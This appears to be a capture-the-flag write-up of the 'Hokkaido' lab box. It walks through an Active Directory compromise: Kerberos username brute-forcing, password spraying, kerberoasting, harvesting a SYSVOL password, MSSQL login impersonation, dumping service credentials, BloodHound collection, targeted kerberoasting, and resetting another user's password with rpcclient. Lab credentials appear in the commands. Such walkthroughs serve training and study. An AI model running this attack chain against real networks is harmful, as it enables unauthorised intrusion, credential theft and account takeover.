# Hokkaido

Using kerbrute for bruteforcing usernames:

```bash
kerbrute userenum --dc 192.168.212.40 -d hokkaido-aerospace.com /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --downgrade
```

We get usernames:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-fed2f04f55f19f7ae09139ce562b5c48d8858dbd%2F5f70acd0ec3e0f5ea47e94be623718a2.png?alt=media) Now bruteforcing passwords with the usernames: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-515139b971b04c7668be93f57bc2b3ab0844a515%2F892d14bebe8df28e5bb157e7d442070c.png?alt=media)\\

Now we can try kerberoasting with this account:

```bash
GetUserSPNs.py hokkaido-aerospace.com/info:info -request
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-cd6471f9fef36b6b531484979ea9642450c7ef05%2Fc6b6f7d617322665a13df8e46da11fd2.png?alt=media) We get two hashes but they are uncrackable:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-d2031b8766c00049e5959d56d2bd2b459104f133%2Fba75fa0c62cda02890227e8ecf6f9e64.png?alt=media)

Now checking SYSVOL share for scripts: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-0a24b6107b1c7ce8b923097e5157f8f9eeefa8d3%2F2ae5d9b5494df825d90b29b3a54eb003.png?alt=media) ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-c29d4889bf898133e8642fcba784120ab3a98b74%2F69014b0a052e318f497397e0867c1c21.png?alt=media) Now we get a password so spraying it: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-9e2ebbe93cc414503c6b58a79596b46c6567e098%2F848e04d85b33bb9b34ab2917fd15d1af.png?alt=media) Now using discovery user we can login to Mssql:

```bash
mssqlclient.py -windows-auth -dc-ip 192.168.212.40 hokkaido-aerospace.com/discovery:'Start123!'@192.168.212.40
```

Now checking for impersonation:

```
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-255e71d6a8da20cf0f1de0d256c4dae76acda6a9%2F244d7632d9f665459f905bdba65f705d.png?alt=media)

Now to impersonate:

```
EXECUTE AS LOGIN = 'hrappdb-reader' SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin')
```

Now checking:

```
SELECT SYSTEM_USER
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-69f2061b025fcae12321555de6087bf1267937d3%2F665f7d64150e1c79672f50646d82414e.png?alt=media) Now checking databases:

```
SELECT name FROM master.dbo.sysdatabases
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-88338bd6381bf8ce96994b0f369dbe308060ebe3%2Ff17153e53b0832857d718d981b897895.png?alt=media) Checking all tables:

```
SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES;
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-335b3137aebf06c7b4d1c7bf7d0b9e0387e794d1%2Fc1c0f18677ff89cdd6765abc75db208a.png?alt=media)

```
select * from sysauth;
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-4c67805de37f871c470d3b218c2974a55e460e90%2Ff0fbf2c986e1b7b81d0e09c0c317caf3.png?alt=media)

Now with the creds we can run bloodhound:

```
nxc ldap 192.168.212.40 -u hrapp-service -p 'Untimed$Runny' --bloodhound --collection All -ns 192.168.212.40
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-b5408dc1ace33005ec3ed4aae88dd2de83e51e02%2Fe3a1b6f73fdbb9a5e8816038f6a9c8d0.png?alt=media) Checking outbound transitive object control we have generic write over hazel. Doing a targeted kerberoast:

```
targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny'
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-7f1a623ef56a2cc0e251a555a9ca4eef7c9e06b7%2Fbd16e3763c8d2fddfa32c5379974e530.png?alt=media) Only hazel's hash gets cracked. ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-2447cf6c2ab96c85f1cd1f043f7f5495a28a1612%2F20a92c73113e174b45f4b6b162c83d10.png?alt=media)

We belong to Tier2-Admins and we have GenericWrite access over Administrators: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-dfbb8be96f821a2ae8ffda79350a57362dad6caa%2Fca47130d083b1010f9b37833b4089355.png?alt=media) But doesn't work for some reason

```
rpcclient //192.168.94.135 -U hokkaido-aerospace.com/hazel.green%haze1988c
```

```
rpcclient $> setuserinfo2 MOLLY.SMITH 23 'Start123!'
```